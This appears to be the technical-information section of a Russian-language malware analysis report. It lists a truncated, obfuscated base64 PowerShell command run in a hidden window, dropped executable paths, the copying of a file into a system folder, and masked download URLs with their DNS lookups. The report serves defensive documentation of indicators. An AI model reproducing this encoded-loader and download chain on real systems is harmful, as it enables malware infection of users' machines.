Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABBAGsAaABhAGwAeAAxAD0AKAAoACcAWgBwACcAKwAnAHgAJwApACsAKAAnAG4AJwArACcANAAwAGMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAHIAcABSAG8AZgBpAEwAZQ...
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe в %WINDIR%\syswow64\bidispl\mfcm100u.exe
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
- http://jo###pper.com/8.7.19/UOULtnSR/
- http://to####eakhouse.com/wp-includes/GUjvEUEdmc/
- DNS ASK jo###pper.com
- DNS ASK to####eakhouse.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABBAGsAaABhAGwAeAAxAD0AKAAoACcAWgBwACcAKwAnAHgAJwApACsAKAAnAG4AJwArACcANAAwAGMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAHIAcABSAG8AZgBpAEwAZQ...' (со скрытым окном)